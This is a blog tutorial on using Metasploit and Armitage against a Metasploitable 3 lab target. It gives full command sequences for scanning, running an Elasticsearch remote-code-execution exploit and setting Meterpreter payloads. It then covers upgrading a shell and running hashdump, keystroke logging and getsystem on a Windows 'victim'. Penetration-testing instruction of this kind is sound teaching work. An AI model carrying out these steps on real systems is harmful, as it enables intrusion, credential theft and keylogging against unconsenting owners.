Posted on by Glenn

[ Pen Testing ] :: Step by Step: Metasploit and Armitage

Metasploit and Armitage

Starting Metasploit

Generic Metasploit installation instructions for any OS:
https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework

Instructions for starting Metasploit in Kali:
https://docs.kali.org/general-use/starting-metasploit-framework-in-kali

The default install of Metasploit that comes with Kali needs to be initialized.

service postgresql start
msfdb init # only if necessary

Starting msfconsole

msfconsole

Once msfconsole is running:

msf>db_status # check database status
# if there's a db problem, like running slow, try:
msf>help
msf>db_rebuild_cache # note this command in help
# now searches like:
msf>search ftp
# will be much faster

Database credentials are stored in this file:
/opt/metasploit/apps/pro/ui/config/database.yml

Metasploit Modules

In a separate Bash window, go  to the Metasploit folder.

cd /usr/share/metasploit-framework
ls

Note the Modules directory.

cd modules
ls

See the five different types of modules (folder names).

cd exploits
ls

The folders inside exploits/ are named for operating systems.  Change to windows/smb (look around as you go).

cd windows
ls
cd smb
ls

Search for a Module

In the msfconsole window, use search:

msf> search psexec # note that we don't use the file extension .rb

Copy the path to that exploit.

msf> use exploit/windows/smb/psexec #again, no .rb extension.

Your location (context) changes (note the command prompt). While you’re in the smb/ folder, use the info command for details.

msf exploit(psexec) >  info

You can look at the module contents in back in Bash using less (or more or cat):

less psexec.rb

Look carefully at variables in particular.  Close less.

Use back whenever you need to go back to the home directory. But don’t do that just yet.

msf> back

The msfconsole supports tab completion, so typing “aux” then Tab will complete “auxiliary”.

msf >  use aux<Tab> 
#aux automatically expands to auxiliary

Workspaces

A workspace keeps one project’s data separate from another’s. See this article on workspaces:
https://www.ceos3c.com/hacking/metasploit-how-to-use-workspaces-and/. (Yes the URL ends that way; CMSs can generate some funny links.)

Check the syntax, list your workspaces and create a workspace:

msf exploit(psexec) > workspace --help
msf exploit(psexec) > workspace # show all workspaces
msf exploit(psexec) > workspace -a ms3 # create a workspace

When you create a workspace you automatically change to it. You can change workspaces like this, but don’t do it yet:

msf > workspace default

Instead, while you’re in your new workspace, run the hosts command:

msf > hosts

You won’t have any listed yet, but now you know how to see the ones you find. While you’re at it try the services command, and the help command to see a list of Database Backend Commands and tables.

msf > services
msf > help

Scanning

–>See Hacking Metasploitable 3: Discovering Remote Services with NMap at https://www.youtube.com/watch?v=sHS4kHKcQhc .

Perform a preliminary scan of the target within msfconsole.  You could run nmap directly inside the msfconsole, but using db_nmap command enters the scan results into the Metasploit database.

msf > db_nmap -sn -n -v --exclude 192.168.0.10 192.168.0.1-100

… where 192.168.0.10 is your own IP address.

-sn # arp ping scan only; this will work when ICMP ping won’t!
-n # don’t bother doing any DNS lookups
-v # verbose can you say it more words yes more words
–exclude # please exclude me
1-100 # because we don’t want to be too stinkeen noisy

See your results with hosts command.

msf > hosts

We could do a fast (-F) scan of just the top 100 ports:

db_nmap -F -sS -n -v --reason --open 192.168.0.25

… assuming 192.168.0.25 is the target you’ve found.

-F # only 100 ports
-sS # SYN scan of cource
-n # remember no DNS
–reason # only show result lines for a reason
–open # that reason is: they’re open

Run the services command:

msf > services

Now you can see target services. Investigate each for vulnerabilities/exploits. In Metasploitable 3, the Elasticsearch service is a target:

msf exploit(psexec) > search Elasticsearch

You’ll get a list of possible modules. Research and select one.

msf exploit(psexec) > use exploit/multi/elasticsearch/script_mvel_rce
msf exploit(script_mvel_rce) > show options
msf exploit(script_mvel_rce) > set RHOST 192.168.0.25 # sets value
msf exploit(script_mvel_rce) > set RHOST # shows value
msf exploit(script_mvel_rce) > show advanced # lists advanced variables

You can set a global variable (within this msf session):

msf exploit(script_mvel_rce) > setg RHOST 192.168.0.197

Set will override setg if used inside a particular module.

Once you’ve set the necessary vars, you can run the exploit command:

msf exploit(script_mvel_rce) > exploit

The resulting messages are tagged by color. Red indicates an error. Depending on the exploit, you may get a Meterpreter shell.

Post-exploit

Now we need to run post-exploit commands. Check them out in Bash:

cd ../../post/
ls
cd windows/
ls

Subfolders are named for the action they’ll take.

Back in msf:

meterpreter > run post/windows/manage/<TAB>
# to see candidate post modules
meterpreter > run post/windows/manage/

Background meterpreter to got back to msf:

meterpreter > background
msf exploit(script_mvel_rce) >

Payloads

Look at payloads:

msf exploit(script_mvel_rce) > show # shows payload types
msf exploit(script_mvel_rce) > show payloads # note plural lowercase
msf exploit(script_mvel_rce) > show <TAB> <TAB> # for a list

Set the payload. A Meterpreter shell is generally the best, but it may conflict with IDS.

msf exploit(script_mvel_rce) > set PAYLOAD java/meterpreter/reverse-http
msf exploit(script_mvel_rce) > run

Upgrading from cmd.exe to a Meterpreter Session

Let’s do this as a walk-through. Our victim is 192.168.0.25, and we are 192.168.0.10.

If you’d like to see this as a video, go to:
https://www.youtube.com/watch?v=LRS05gvcvdk

1. In Terminal 1 (Bash), ping and scan:

fping 192.168.0.25

nmap -sS -sV -T4 192.168.0.25

2. Open Terminal 2 and fire up msfconsole:

cd /pentests/exploits/framework3

msfconsole

3. Start a handler:

msf > use multi/handler

msf > set payload windows/shell_bind_TCP

4. Configure:

msf > show options

msf > set RHOST 192.168.0.25

5. Exploit:

msf > exploit

Bang: if everything works you get a Windows cmd shell.

Use Ctl-Z to background this session. Confirm Yes.

Back in msfconsole, confirm we have a session on the Windows box:

msf > sessions -l # that's an ell

View options:

msf > sessions -h ?

Note the -u option.

It might be a good time to set options globally:

msf > setg LHOST 192.168.0.10 # me

msf > setg RHOST 192.168.0.25 # target

Now upgrade that shell in session 1:

msf > sessions -u 1

You’ll eventually get a message: session 2 opened.

Confirm the session exists by listing again:

msf > sessions -l # that's an ell

Now go to that session:

msf > sessions -i 2

Boom! You’re in the remote Meterpreter!

msf > sysinfo

msf > hashdump

msf > screenshot

msf > keyscan_start

Ha ha, open Notepad in the Windows victim and write  yourself a little note:

Roses are red,
Violets are blue,
All of my base
BELONG TO YOU!

Back in Meterpreter, run:

msf > keyscan dump

… and see the nice little message to  yourself. You’re a poet.

Try the most elementary privilege escalation:

msf > getsystem

If this works you’re huge and golden: the SYSTEM user.

Armitage

Wish you had Metasploit Pro? Try using Armitage on top of Metasploit, and get most of the Pro features.
https://www.binarytides.com/run-metasploit-armitage-kali/

Start Armitage:

armitage